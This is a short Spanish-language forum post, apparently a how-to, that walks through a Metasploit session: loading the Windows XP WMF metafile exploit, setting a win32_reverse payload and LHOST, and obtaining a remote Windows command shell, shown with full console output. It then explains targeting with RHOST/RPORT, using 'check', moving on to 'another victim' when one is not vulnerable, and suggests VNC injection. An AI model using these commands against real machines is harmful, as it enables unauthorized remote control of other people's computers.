voy a poner unas IP (falsas) a ver si te ayuda...porque la idea es que aprendamos a usar el metasploit framework...

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 200.168.0.2
LHOST -> 200.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 200.168.0.2:4321 <-> 200.168.0.219:1061
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\XXXX\Desktop>
no te olvides que LHOST no es lo mismo que RHOST (se entiende

) y despues de que pongas la ip remota y especifiques el puerto (por defecto 80)
msf exploit a usar > set RHOST IP_Victima
RHOST -> IP_victima
msf exploit a usar > set RPORT 80
RPORT -> 80
puedes usar el comando ‘check’
msf exploit a usar> check
[*] The system does not appear to be vulnerable
en ese caso buscamos otra victima...
msf exploit a usar > set RHOST IP_nueva_vitima
RHOST -> Ip_nueva_victima
msf exploit a usar > check
[*] The system appears to be vulnerable
tambien puedes probar con usar ¨win32_reverse_VNCinject¨(Virtual Network Computer)
Salu2 Boys!!! y happy new year...